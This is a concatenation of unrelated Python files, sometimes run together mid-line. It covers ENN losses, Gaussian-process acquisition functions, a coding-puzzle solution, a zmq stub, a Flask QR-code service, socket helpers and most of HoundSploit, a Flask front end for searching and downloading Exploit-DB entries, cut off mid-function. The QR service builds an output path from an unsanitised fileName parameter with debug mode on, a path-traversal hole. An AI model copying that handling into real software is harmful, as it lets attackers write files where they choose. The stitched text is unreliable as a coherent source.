#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Helpful losses for the ENN agent."""
from typing import Callable, Optional

from enn import base as enn_base
from enn import data_noise
from enn import losses
from neural_testbed import base as testbed_base

EnnCtor = Callable[[testbed_base.PriorKnowledge], enn_base.EpistemicNetwork]
LossCtor = Callable[
    [testbed_base.PriorKnowledge, enn_base.EpistemicNetwork], enn_base.LossFn]


def default_enn_prior_loss(num_index_samples: int = 10) -> LossCtor:
  def prior_loss_ctor(prior: testbed_base.PriorKnowledge,
                      enn: enn_base.EpistemicNetwork) -> enn_base.LossFn:
    del enn
    if prior.num_classes > 1:
      return losses.ClassificationPriorLoss(num_index_samples)
    else:
      return losses.RegressionPriorLoss(num_index_samples)
  return prior_loss_ctor


def default_enn_loss(num_index_samples: int = 10,
                     distribution: str = 'none',
                     seed: int = 0,
                     weight_reg_scale: Optional[float] = None) -> LossCtor:
  """Constructs a default loss suitable for classification or regression."""
  def loss_ctor(prior: testbed_base.PriorKnowledge,
                enn: enn_base.EpistemicNetwork) -> enn_base.LossFn:
    # Construct L2 or Xent loss based on regression/classification.
    if prior.num_classes > 1:
      single_loss = losses.combine_single_index_losses_as_metric(
          train_loss=losses.XentLoss(prior.num_classes),
          extra_losses={'acc': losses.AccuracyErrorLoss(prior.num_classes)},
      )
    else:
      single_loss = losses.L2Loss()

    # Add bootstrapping
    boot_fn = data_noise.BootstrapNoise(enn, distribution, seed)
    single_loss = losses.add_data_noise(single_loss, boot_fn)
    loss_fn = losses.average_single_index_loss(single_loss, num_index_samples)

    # Add L2 weight decay
    if weight_reg_scale:
      scale = (weight_reg_scale ** 2) / (2. * prior.num_train)
      loss_fn = losses.add_l2_weight_decay(loss_fn, scale=scale)
    return loss_fn
  return loss_ctor


def gaussian_regression_loss(num_index_samples: int,
                             noise_scale: float = 1,
                             l2_weight_decay: float = 0,
                             exclude_bias_l2: bool = True) -> LossCtor:
  """Add a matching Gaussian noise to the target y."""
  def loss_ctor(prior: testbed_base.PriorKnowledge,
                enn: enn_base.EpistemicNetwork) -> enn_base.LossFn:
    """Add a matching Gaussian noise to the target y."""
    noise_std = noise_scale * prior.noise_std
    noise_fn = data_noise.GaussianTargetNoise(enn, noise_std)
    single_loss = losses.add_data_noise(losses.L2Loss(), noise_fn)
    loss_fn = losses.average_single_index_loss(single_loss, num_index_samples)
    if l2_weight_decay != 0:
      if exclude_bias_l2:
        predicate = lambda module, name, value: name != 'b'
      else:
        predicate = lambda module, name, value: True
      loss_fn = losses.add_l2_weight_decay(loss_fn, l2_weight_decay, predicate)
    return loss_fn
  return loss_ctor


def regularized_dropout_loss(num_index_samples: int = 10,
                             dropout_rate: float = 0.05,
                             scale: float = 1e-2,
                             tau: float = 1.0) -> LossCtor:
  """Constructs the special regularized loss of the paper "Dropout as a Bayesian
  Approximation: Representing Model Uncertainty in Deep Learning" (2015)."""
  def loss_ctor(prior: testbed_base.PriorKnowledge,
                enn: enn_base.EpistemicNetwork) -> enn_base.LossFn:
    del enn  # Unused
    if prior.num_classes > 1:
      single_loss = losses.combine_single_index_losses_as_metric(
          train_loss=losses.XentLoss(prior.num_classes),
          extra_losses={'acc': losses.AccuracyErrorLoss(prior.num_classes)},
      )
    else:
      single_loss = losses.L2Loss()
    reg = (scale ** 2) * (1 - dropout_rate) / (2. * prior.num_train * tau)
    loss_fn = losses.average_single_index_loss(single_loss, num_index_samples)
    return losses.add_l2_weight_decay(loss_fn, scale=reg)
  return loss_ctor


def combine_loss_prior_loss(loss_fn: enn_base.LossFn,
                            prior_loss_fn: Optional[enn_base.LossFn] = None,
                            weight: float = 1.) -> enn_base.LossFn:
  """Compatibility wrapper for deprecated prior_loss_fn interface."""
  if prior_loss_fn is None:
    return loss_fn
  else:
    return losses.combine_losses([
        losses.CombineLossConfig(loss_fn, 'loss'),
        losses.CombineLossConfig(prior_loss_fn, 'prior', weight),
    ])


gpsearch/core/acquisitions/ints.py
import numpy as np
from .base import Acquisition, AcquisitionWeighted
from ..utils import grid_nint, add_xnew, jacobian_fdiff


class IVRInt(Acquisition):
    """A class for IVR computed by numerical integration.

    Parameters
    ----------
    model, inputs : see parent class (Acquisition)
    ngrid : int
        Number of grid points in each direction

    Attributes
    ----------
    model, inputs, ngrid : see Parameters
    pts : array
        Grid points as a vector of size ngrid^dim

    Notes
    -----
    This class computes IVR by numerical integration on a grid. This is
    intractable/inaccurate in dimensions greater than 4, so it is intended
    for debugging purposes only.
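
    Examples
    --------
    Illustrative sketch only (added here for clarity, not part of the
    original source). It assumes a GPy regression model and assumes that
    the ``Acquisition`` base class only stores ``model`` and ``inputs`` and
    supplies ``get_weights``; the ``SimpleNamespace`` stand-in for
    ``inputs`` exposes just the ``domain`` and ``input_dim`` attributes this
    class reads directly::

        import numpy as np
        import GPy
        from types import SimpleNamespace
        from gpsearch.core.acquisitions.ints import IVRInt

        X = np.random.uniform(-1.0, 1.0, size=(20, 2))
        y = np.sin(X[:, [0]]) + np.cos(X[:, [1]])
        model = GPy.models.GPRegression(X, y)
        inputs = SimpleNamespace(domain=[(-1.0, 1.0), (-1.0, 1.0)], input_dim=2)
        acq = IVRInt(model, inputs, ngrid=50)
        score = acq.evaluate(np.zeros(2))   # pointwise acquisition value at the origin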
""" def __init__(self, model, inputs, ngrid=200): super().__init__(model, inputs) self.ngrid = ngrid grd = np.mgrid[ [slice(-5*np.max(np.abs(bd)), 5*np.max(np.abs(bd)), ngrid*1j) \ for bd in inputs.domain] ] self.pts = grd.T.reshape(-1, inputs.input_dim) def evaluate(self, x): x = np.atleast_2d(x) _, var = self.model.predict(x) if self.model.normalizer: var /= self.model.normalizer.std**2 cov = self.model.posterior_covariance_between_points(x, self.pts) wghts = self.get_weights(self.pts) int_cov = grid_nint(self.pts, wghts.flatten() * cov.flatten()**2, ngrid=self.ngrid) return -int_cov/var def jacobian(self, x): return jacobian_fdiff(self, x) class IVR_LWInt(AcquisitionWeighted, IVRInt): """A class for IVR-LW computed by numerical integration. Parameters ---------- model, inputs, likelihood : see parent class (AcquisitionWeighted) ngrid : int Number of grid points in each direction Attributes ---------- model, inputs, likelihood, ngrid : see Parameters pts : array Grid points as a vector of size ngrid^dim Notes ----- This class computes IVR-LW by numerical integration on a grid. This is intractable/inaccurate in dimensions greater than 4, so it is intended for debugging purposes only. """ def __init__(self, model, inputs, likelihood=None, ngrid=200): super().__init__(model, inputs, likelihood=likelihood) self.ngrid = ngrid grd = np.mgrid[ [slice(-5*np.max(np.abs(bd)), 5*np.max(np.abs(bd)), ngrid*1j) \ for bd in inputs.domain] ] self.pts = grd.T.reshape(-1, inputs.input_dim) class QInt(AcquisitionWeighted): """A class for the Q criterion computed by numerical integration. Parameters ---------- model, inputs, likelihood : see parent class (AcquisitionWeighted) ngrid : int Number of grid points in each direction Attributes ---------- model, inputs, likelihood, ngrid : see Parameters pts : array Grid points as a vector of size ngrid^dim Notes ----- This class computes Q by numerical integration on a grid. This is intractable/inaccurate in dimensions greater than 4, so it is intended for debugging purposes only. """ def __init__(self, model, inputs, likelihood=None, ngrid=200): super().__init__(model, inputs, likelihood=likelihood) self.ngrid = ngrid grd = np.mgrid[ [slice(-5*np.max(np.abs(bd)), 5*np.max(np.abs(bd)), ngrid*1j) \ for bd in inputs.domain] ] self.pts = grd.T.reshape(-1, inputs.input_dim) def evaluate(self, x): x = np.atleast_2d(x) gpn = add_xnew(x, self.model) _, var_new = gpn.predict(self.pts) wghts = np.exp(self.likelihood.gmm.score_samples(self.pts)) qdx = wghts * var_new.flatten() # Normalize by current variance if gpn.normalizer: qdx /= gpn.normalizer.std**2 Q = grid_nint(self.pts, qdx, ngrid=self.ngrid) return Q def jacobian(self, x): return jacobian_fdiff(self, x) #!/bin/python3 import sys def getTotalX(a, b): # Complete this function if max(a) > min(b): return 0 if max(a) == min(b): return 1 pb_list = list(range(max(a), min(b) + 1)) rm_list = [] for p in pb_list: for ta in a: if p % ta != 0: rm_list.append(p) break for p in pb_list: for tb in b: if tb % p != 0: rm_list.append(p) break rm_list = list(set(rm_list)) return len(pb_list) - len(rm_list) if __name__ == "__main__": n, m = input().strip().split(' ') n, m = [int(n), int(m)] a = list(map(int, input().strip().split(' '))) b = list(map(int, input().strip().split(' '))) total = getTotalX(a, b) print(total) src/trade/engine.py """ Main file that uses zmq message queue and an infinite loop to implement the trading engine with strategies and analysis. 
""" import zmq from utilities import logger log = logger.get_logger_config(__name__) def run() -> None: # Setup zmq variables. ctx = zmq.Context() log.info("Connecting to the data server...") socket = ctx.socket(zmq.REQ) socket.connect("tcp://localhost:5555") # Initial testing. Loop 10 times for each request. for request in range(10): log.info("Send request %d..." % request) socket.send(b"{engine data}.") # Obtain reply. message = socket.recv() log.info("Received reply %s [ %s ]" % (request, message))script.py import pyqrcode import png import flask from pyqrcode import QRCode from flask import request app = flask.Flask(__name__) app.config["DEBUG"] = True @app.route( '/qr-code', methods=['GET'] ) def genQR(): if 'string' in request.args: QRString = request.args['string'] else: return "You must provide a string." if 'fileName' in request.args: fileName = request.args['fileName'] else: return "You must provide a file name" # QRString = 'https://www.alegreshow.com.br' url = pyqrcode.create(QRString) url.png(r'qr-codes/' + fileName + '.png', scale = 8) return "" app.run()#- # flipper_tools.py #- # import numpy as np import os def read_bin_edges(bin_file, skiprows=0): print("[flipper_tools] loading %s" %bin_file) assert(os.path.exists(bin_file)) (lower, upper, center) = np.loadtxt(bin_file, skiprows=skiprows, unpack=True) return np.concatenate((lower[0:1], upper)) tristan-white/dhtnetwork.py # reads from socket until "\r\n" def read_from_socket(s): result = "" while 1: data = s.recv(256) if data[-2:] == "\r\n": result += data[:-2] break result += data # if result != "": # print "read : %s" % result return result # sends all on socket, adding "\r\n" def send_to_socket(s, msg): # print "respond : %s" % msg s.sendall(str(msg) + "\r\n") import os import shutil import sys import datetime import platform from flask import Flask, render_template, request from HoundSploit.searcher.engine.search_engine import search_vulnerabilities_in_db, get_exploit_by_id, get_shellcode_by_id,\ get_vulnerability_extension, get_vulnerability_filters, search_vulnerabilities_advanced from HoundSploit.searcher.engine.keywords_highlighter import highlight_keywords_in_description, highlight_keywords_in_file, \ highlight_keywords_in_port from HoundSploit.searcher.engine.suggestions import substitute_with_suggestions, propose_suggestions, get_suggestions_list,\ new_suggestion, remove_suggestion, DEFAULT_SUGGESTIONS from HoundSploit.searcher.engine.updates import get_latest_db_update_date, install_updates from HoundSploit.searcher.engine.utils import check_file_existence, get_vulnerability_extension, get_n_needed_pages from HoundSploit.searcher.engine.csv2sqlite import create_db from HoundSploit.searcher.engine.sorter import sort_results from HoundSploit.searcher.engine.bookmarks import new_bookmark, is_bookmarked, remove_bookmark, get_bookmarks_list from HoundSploit.searcher.engine.fix_dates import fix_dates, create_fixed_db from shutil import copyfile init_path = os.path.abspath(os.path.expanduser("~") + "/.HoundSploit") template_dir = os.path.abspath(init_path + '/houndsploit/HoundSploit/templates') static_folder = os.path.abspath(init_path + '/houndsploit/HoundSploit/static') app = Flask(__name__, template_folder=template_dir, static_folder=static_folder) N_RESULTS_FOR_PAGE = 10 @app.route('/', methods=['GET', 'POST']) def get_results_table(): """ Render a table with a list of search results. :return: results_table.html template with search results. 
""" if request.method == 'POST': current_exploits_page = request.form['hid-e-page'] current_view = request.form['current-view'] try: current_exploits_page = int(current_exploits_page) except ValueError: current_exploits_page = 1 current_shellcodes_page = request.form['hid-s-page'] current_view = request.form['current-view'] try: current_shellcodes_page = int(current_shellcodes_page) except ValueError: current_shellcodes_page = 1 sorting_type = request.form['sorting-type'] searched_text = request.form['searched-text'] searched_text = substitute_with_suggestions(searched_text) suggested_search_text = propose_suggestions(searched_text) if str(searched_text).isspace() or searched_text == "": return render_template('home.html', current_exploits_page=1, current_shellcodes_page=1, sorting_type="Most recent") key_words_list = (str(searched_text).upper()).split() exploits_list = search_vulnerabilities_in_db(searched_text, 'searcher_exploit') exploits_list = sort_results(exploits_list, sorting_type) n_exploits = len(exploits_list) latest_exploits_page = get_n_needed_pages(n_exploits) if current_exploits_page < 1: current_exploits_page = 1 index_first_result = 0 elif current_exploits_page > latest_exploits_page: current_exploits_page = latest_exploits_page index_first_result = (int(current_exploits_page) - 1) * N_RESULTS_FOR_PAGE else: index_first_result = (int(current_exploits_page) - 1) * N_RESULTS_FOR_PAGE index_last_result = index_first_result + N_RESULTS_FOR_PAGE exploits_list = exploits_list[index_first_result:index_last_result] for result in exploits_list: if result.port is None: result.port = '' shellcodes_list = search_vulnerabilities_in_db(searched_text, 'searcher_shellcode') shellcodes_list = sort_results(shellcodes_list, sorting_type) n_shellcodes = len(shellcodes_list) latest_shellcodes_page = get_n_needed_pages(n_shellcodes) if current_shellcodes_page < 1: current_shellcodes_page = 1 index_first_result = 0 elif current_shellcodes_page > latest_shellcodes_page: current_shellcodes_page = latest_shellcodes_page index_first_result = (int(current_shellcodes_page) - 1) * N_RESULTS_FOR_PAGE else: index_first_result = (int(current_shellcodes_page) - 1) * N_RESULTS_FOR_PAGE index_last_result = index_first_result + N_RESULTS_FOR_PAGE shellcodes_list = shellcodes_list[index_first_result:index_last_result] if str(searched_text).isnumeric(): exploits_list = highlight_keywords_in_file(key_words_list, exploits_list) shellcodes_list = highlight_keywords_in_file(key_words_list, shellcodes_list) exploits_list = highlight_keywords_in_port(key_words_list, exploits_list) exploits_list = highlight_keywords_in_description(key_words_list, exploits_list) shellcodes_list = highlight_keywords_in_description(key_words_list, shellcodes_list) return render_template('results_table.html', searched_item=searched_text, exploits_list=exploits_list, shellcodes_list=shellcodes_list, searched_text=searched_text, suggested_search_text=suggested_search_text, n_exploits=n_exploits, current_exploits_page=current_exploits_page, latest_exploits_page=latest_exploits_page, current_view=current_view, n_shellcodes=n_shellcodes, current_shellcodes_page=current_shellcodes_page, latest_shellcodes_page=latest_shellcodes_page, sorting_type=sorting_type) else: return render_template('home.html', current_exploits_page=1, current_shellcodes_page=1, sorting_type="Most recent") @app.route('/advanced-search', methods=['GET', 'POST']) def get_results_table_advanced(): """ Render a table with a list of search results. 
:return: results_table.html template with search results. """ vulnerability_types_list, vulnerability_platforms_list = get_vulnerability_filters() if request.method == 'POST': current_exploits_page = request.form['hid-e-page'] current_view = request.form['current-view'] try: current_exploits_page = int(current_exploits_page) except ValueError: current_exploits_page = 1 current_shellcodes_page = request.form['hid-s-page'] current_view = request.form['current-view'] try: current_shellcodes_page = int(current_shellcodes_page) except ValueError: current_shellcodes_page = 1 sorting_type = request.form['sorting-type'] searched_text = request.form['searched-text'] operator_filter = request.form['search-operator'] author_filter = request.form['author'] type_filter = request.form['type'] platform_filter = request.form['platform'] port_filter = request.form['port'] date_from_filter = request.form['date-from'] date_to_filter = request.form['date-to'] searched_text = substitute_with_suggestions(searched_text) suggested_search_text = propose_suggestions(searched_text) if str(searched_text).isspace() or searched_text == "": return render_template('advanced_searcher.html', vulnerability_types_list=vulnerability_types_list, vulnerability_platforms_list=vulnerability_platforms_list, current_exploits_page=1, current_shellcodes_page=1, sorting_type="Most recent") key_words_list = (str(searched_text).upper()).split() date_alert = None try: date_from = datetime.datetime.strptime(date_from_filter, '%Y-%m-%d') date_to = datetime.datetime.strptime(date_to_filter, '%Y-%m-%d') if date_from > date_to: date_from_filter = "mm/dd/yyyy" date_to_filter = "mm/dd/yyyy" date_alert = "ERROR: date range not valid!" except ValueError: date_from_filter = "mm/dd/yyyy" date_to_filter = "mm/dd/yyyy" exploits_list = search_vulnerabilities_advanced(searched_text, 'searcher_exploit', operator_filter, type_filter, platform_filter, author_filter, port_filter, date_from_filter, date_to_filter) exploits_list = sort_results(exploits_list, sorting_type) n_exploits = len(exploits_list) latest_exploits_page = get_n_needed_pages(n_exploits) if current_exploits_page < 1: current_exploits_page = 1 index_first_result = 0 elif current_exploits_page > latest_exploits_page: current_exploits_page = latest_exploits_page index_first_result = (int(current_exploits_page) - 1) * N_RESULTS_FOR_PAGE else: index_first_result = (int(current_exploits_page) - 1) * N_RESULTS_FOR_PAGE index_last_result = index_first_result + N_RESULTS_FOR_PAGE exploits_list = exploits_list[index_first_result:index_last_result] for result in exploits_list: if result.port is None: result.port = '' shellcodes_list = search_vulnerabilities_advanced(searched_text, 'searcher_shellcode', operator_filter, type_filter, platform_filter, author_filter, port_filter, date_from_filter, date_to_filter) shellcodes_list = sort_results(shellcodes_list, sorting_type) n_shellcodes = len(shellcodes_list) latest_shellcodes_page = get_n_needed_pages(n_shellcodes) if current_shellcodes_page < 1: current_shellcodes_page = 1 index_first_result = 0 elif current_shellcodes_page > latest_shellcodes_page: current_shellcodes_page = latest_shellcodes_page index_first_result = (int(current_shellcodes_page) - 1) * N_RESULTS_FOR_PAGE else: index_first_result = (int(current_shellcodes_page) - 1) * N_RESULTS_FOR_PAGE index_last_result = index_first_result + N_RESULTS_FOR_PAGE shellcodes_list = shellcodes_list[index_first_result:index_last_result] if str(searched_text).isnumeric(): exploits_list = 
highlight_keywords_in_file(key_words_list, exploits_list) shellcodes_list = highlight_keywords_in_file(key_words_list, shellcodes_list) exploits_list = highlight_keywords_in_port(key_words_list, exploits_list) exploits_list = highlight_keywords_in_description(key_words_list, exploits_list) shellcodes_list = highlight_keywords_in_description(key_words_list, shellcodes_list) return render_template('advanced_results_table.html', searched_item=searched_text, exploits_list=exploits_list, shellcodes_list=shellcodes_list, searched_text=searched_text, vulnerability_types_list=vulnerability_types_list, vulnerability_platforms_list=vulnerability_platforms_list, operator_filter=operator_filter, author_filter=author_filter, type_filter=type_filter, platform_filter=platform_filter, port_filter=port_filter, date_from_filter=date_from_filter, date_to_filter=date_to_filter, suggested_search_text=suggested_search_text, date_alert=date_alert, n_exploits=n_exploits, current_exploits_page=current_exploits_page, latest_exploits_page=latest_exploits_page, current_view=current_view, n_shellcodes=n_shellcodes, current_shellcodes_page=current_shellcodes_page, latest_shellcodes_page=latest_shellcodes_page, sorting_type=sorting_type) else: return render_template('advanced_searcher.html', vulnerability_types_list=vulnerability_types_list, vulnerability_platforms_list=vulnerability_platforms_list, current_exploits_page=1, current_shellcodes_page=1, sorting_type="Most recent") @app.route('/exploit-details') def view_exploit_details(): """ Open details about the selected exploit, included the source code. :return: a template showing the details about the selected exploit and the source code. """ vulnerability_class = "exploit" exploit_id = request.args.get('exploit-id', None) searched_text = request.args.get('searched-text', None) is_prev_page_bookmarks = request.args.get('isprevpagebookmarks', None) if is_prev_page_bookmarks == "true": is_prev_page_bookmarks = True else: is_prev_page_bookmarks = False exploit = get_exploit_by_id(exploit_id) if exploit is None: error_msg = 'Sorry! This exploit does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + exploit.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=exploit.description, vulnerability_file=exploit.file, vulnerability_author=exploit.author, vulnerability_date=exploit.date, vulnerability_type=exploit.type, vulnerability_platform=exploit.platform, vulnerability_port=exploit.port, file_path=file_path, exploit_id=exploit_id, bookmarked=is_bookmarked(exploit_id, vulnerability_class), searched_text=searched_text, is_prev_page_bookmarks=is_prev_page_bookmarks) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/download-exploit') def download_exploit_details(): """ Download the selected exploit. :return: a template showing the details about the selected exploit and the source code. """ vulnerability_class = "exploit" exploit_id = request.args.get('exploit-id', None) exploit = get_exploit_by_id(exploit_id) if exploit is None: error_msg = 'Sorry! 
This exploit does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + exploit.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) copyfile(file_path, os.path.expanduser("~") + "/exploit_" + exploit_id + get_vulnerability_extension(exploit.file)) download_alert = "exploit_" + exploit_id + get_vulnerability_extension(exploit.file) + " has been downloaded in your home directory" return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=exploit.description, vulnerability_file=exploit.file, vulnerability_author=exploit.author, vulnerability_date=exploit.date, vulnerability_type=exploit.type, vulnerability_platform=exploit.platform, vulnerability_port=exploit.port, file_path=file_path, download_alert=download_alert, exploit_id=exploit_id, bookmarked=is_bookmarked(exploit_id, vulnerability_class)) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/shellcode-details') def view_shellcode_details(): """ Open details about the selected shellcode, included the source code. :return: a template showing the details about the selected shellcode and the source code. """ vulnerability_class = "shellcode" shellcode_id = request.args.get('shellcode-id', None) searched_text = request.args.get('searched-text', None) is_prev_page_bookmarks = request.args.get('isprevpagebookmarks', None) if is_prev_page_bookmarks == "true": is_prev_page_bookmarks = True else: is_prev_page_bookmarks = False shellcode = get_shellcode_by_id(shellcode_id) if shellcode is None: error_msg = 'Sorry! This shellcode does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + shellcode.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=shellcode.description, vulnerability_file=shellcode.file, vulnerability_author=shellcode.author, vulnerability_date=shellcode.date, vulnerability_type=shellcode.type, vulnerability_platform=shellcode.platform, file_path=file_path, shellcode_id=shellcode_id, bookmarked=is_bookmarked(shellcode_id, vulnerability_class), searched_text=searched_text, is_prev_page_bookmarks=is_prev_page_bookmarks) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/download-shellcode') def download_shellcode(): """ Download the selected shellcode. :return: a template showing the details about the selected shellcode and the source code. """ vulnerability_class = "shellcode" shellcode_id = request.args.get('shellcode-id', None) shellcode = get_shellcode_by_id(shellcode_id) if shellcode is None: error_msg = 'Sorry! 
This shellcode does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + shellcode.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) copyfile(file_path, os.path.expanduser("~") + "/shellcode_" + shellcode_id + get_vulnerability_extension(shellcode.file)) download_alert = "shellcode_" + shellcode_id + get_vulnerability_extension(shellcode.file) + " has been downloaded in your home directory" return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=shellcode.description, vulnerability_file=shellcode.file, vulnerability_author=shellcode.author, vulnerability_date=shellcode.date, vulnerability_type=shellcode.type, vulnerability_platform=shellcode.platform, file_path=file_path, download_alert=download_alert, shellcode_id=shellcode_id, bookmarked=is_bookmarked(shellcode_id, vulnerability_class)) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/settings') def settings(): """ Show settings page :return: settings templates """ return render_template('settings.html', latest_db_update=get_latest_db_update_date()) @app.route('/update') def get_updates(): """ Check and download new updates for the software and the database :return: settings templates """ install_updates() if check_file_existence(init_path + "/houndsploit_db.lock"): if os.path.isdir(init_path + "/fixed_exploitdb"): create_fixed_db() else: if check_file_existence(init_path + "/hound_db.sqlite3"): os.remove(init_path + "/hound_db.sqlite3") create_db() db_update_alert = True else: db_update_alert = False if check_file_existence(init_path + "/houndsploit_sw.lock"): sw_update_alert = True else: sw_update_alert = False if sw_update_alert == False and db_update_alert == False: no_updates_alert = True else: no_updates_alert = False return render_template('settings.html', latest_db_update=get_latest_db_update_date(), db_update_alert=db_update_alert, sw_update_alert=sw_update_alert, no_updates_alert=no_updates_alert) @app.route('/suggestions') def suggestions_manager(): """ Open suggestions manager :return: suggestion manager template """ return render_template('suggestions.html', suggestions=get_suggestions_list(), default_suggestions=DEFAULT_SUGGESTIONS) @app.route('/add-suggestion', methods=['GET', 'POST']) def add_suggestion(): """ Add a new suggestion inserted by the user. :return: the 'suggestions.html' template. In case of error it shows an error message. """ if request.method == 'POST': searched = request.form['searched'] suggestion = request.form['suggestion'] autoreplacement = request.form['autoreplacement'] if not str(searched).lower() in DEFAULT_SUGGESTIONS: new_suggestion(searched, suggestion, autoreplacement) return render_template('suggestions.html', suggestions=get_suggestions_list(), default_suggestions=DEFAULT_SUGGESTIONS) else: error = 'ERROR: Default suggestions cannot be modified!' return render_template('suggestions.html', suggestions=get_suggestions_list(), suggestion_error=error, default_suggestions=DEFAULT_SUGGESTIONS) @app.route('/delete-suggestion') def delete_suggestion(): """ Delete a suggestion selected by the user. :return: the 'suggestions.html' template. In case of error it shows an error message. """ searched = request.args.get('searched', None) if str(searched).lower() in DEFAULT_SUGGESTIONS: error = 'ERROR: Default suggestions cannot be deleted!' 
return render_template('suggestions.html', suggestions=get_suggestions_list(), suggestion_error=error, default_suggestions=DEFAULT_SUGGESTIONS) if remove_suggestion(searched): return render_template('suggestions.html', suggestions=get_suggestions_list(), default_suggestions=DEFAULT_SUGGESTIONS) else: error = 'ERROR: The suggestion you want to delete does not exist!' return render_template('suggestions.html', suggestions=get_suggestions_list(), suggestion_error=error, default_suggestions=DEFAULT_SUGGESTIONS) @app.route('/bookmarks', methods=['GET', 'POST']) def bookmarks_manager(): """ Open bookmarks manager :return: bookmarks manager template """ searched_text = "" bookmarks_list = get_bookmarks_list() key_words_list = [] if request.method == 'POST': searched_text = request.form['searched-text'] current_bookmarks_page = int(request.form['hid-b-page']) else: current_bookmarks_page = 1 searched_text = request.args.get('searched', None) if searched_text is None: searched_text = "" if searched_text != "": key_words_list = (str(searched_text).upper()).split() exploits_list = search_vulnerabilities_in_db(searched_text, 'searcher_exploit') shellcodes_list = search_vulnerabilities_in_db(searched_text, 'searcher_shellcode') results_list = exploits_list + shellcodes_list filtered_bookmarks_list = [] for result in results_list: for bookmark in bookmarks_list: if result.description == bookmark.description: filtered_bookmarks_list.append(bookmark) bookmarks_list = filtered_bookmarks_list n_bookmarks = len(bookmarks_list) latest_bookmarks_page = get_n_needed_pages(n_bookmarks) if current_bookmarks_page < 1: current_bookmarks_page = 1 index_first_result = 0 elif current_bookmarks_page > latest_bookmarks_page: current_bookmarks_page = latest_bookmarks_page index_first_result = (int(current_bookmarks_page) - 1) * N_RESULTS_FOR_PAGE else: index_first_result = (int(current_bookmarks_page) - 1) * N_RESULTS_FOR_PAGE index_last_result = index_first_result + N_RESULTS_FOR_PAGE bookmarks_list = bookmarks_list[index_first_result:index_last_result] bookmarks_list = highlight_keywords_in_description(key_words_list, bookmarks_list) return render_template('bookmarks.html', searched_text=searched_text, bookmarks_list=bookmarks_list, current_bookmarks_page=current_bookmarks_page, latest_bookmarks_page=latest_bookmarks_page) @app.route('/bookmark-exploit') def bookmark_exploit(): """ Bookmark the selected exploit. :return: a template showing the details about the selected exploit and the source code. """ vulnerability_class = "exploit" exploit_id = request.args.get('exploit-id', None) exploit = get_exploit_by_id(exploit_id) if exploit is None: error_msg = 'Sorry! This exploit does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + exploit.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) if new_bookmark(exploit_id, vulnerability_class): return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=exploit.description, vulnerability_file=exploit.file, vulnerability_author=exploit.author, vulnerability_date=exploit.date, vulnerability_type=exploit.type, vulnerability_platform=exploit.platform, vulnerability_port=exploit.port, file_path=file_path, exploit_id=exploit_id, bookmarked=is_bookmarked(exploit_id, vulnerability_class)) else: error_msg = 'Sorry! 
This exploit does not exist :(' return render_template('error_page.html', error=error_msg) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/remove-bookmark-exploit') def remove_bookmark_exploit(): """ Remove the bookmark for the selected exploit. :return: a template showing the details about the selected exploit and the source code. """ vulnerability_class = "exploit" exploit_id = request.args.get('exploit-id', None) exploit = get_exploit_by_id(exploit_id) if exploit is None: error_msg = 'Sorry! This exploit does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + exploit.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) test = remove_bookmark(exploit_id, vulnerability_class) return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=exploit.description, vulnerability_file=exploit.file, vulnerability_author=exploit.author, vulnerability_date=exploit.date, vulnerability_type=exploit.type, vulnerability_platform=exploit.platform, vulnerability_port=exploit.port, file_path=file_path, exploit_id=exploit_id, bookmarked=is_bookmarked(exploit_id, vulnerability_class)) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/bookmark-shellcode') def bookmark_shellcode(): """ Bookmark the selected shellcode. :return: a template showing the details about the selected shellcode and the source code. """ vulnerability_class = "shellcode" shellcode_id = request.args.get('shellcode-id', None) shellcode = get_shellcode_by_id(shellcode_id) if shellcode is None: error_msg = 'Sorry! This shellcode does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + shellcode.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) if new_bookmark(shellcode_id, vulnerability_class): return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=shellcode.description, vulnerability_file=shellcode.file, vulnerability_author=shellcode.author, vulnerability_date=shellcode.date, vulnerability_type=shellcode.type, vulnerability_platform=shellcode.platform, file_path=file_path, shellcode_id=shellcode_id, bookmarked=is_bookmarked(shellcode_id, vulnerability_class)) else: error_msg = 'Sorry! This shellcode does not exist :(' return render_template('error_page.html', error=error_msg) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/remove-bookmark-shellcode') def 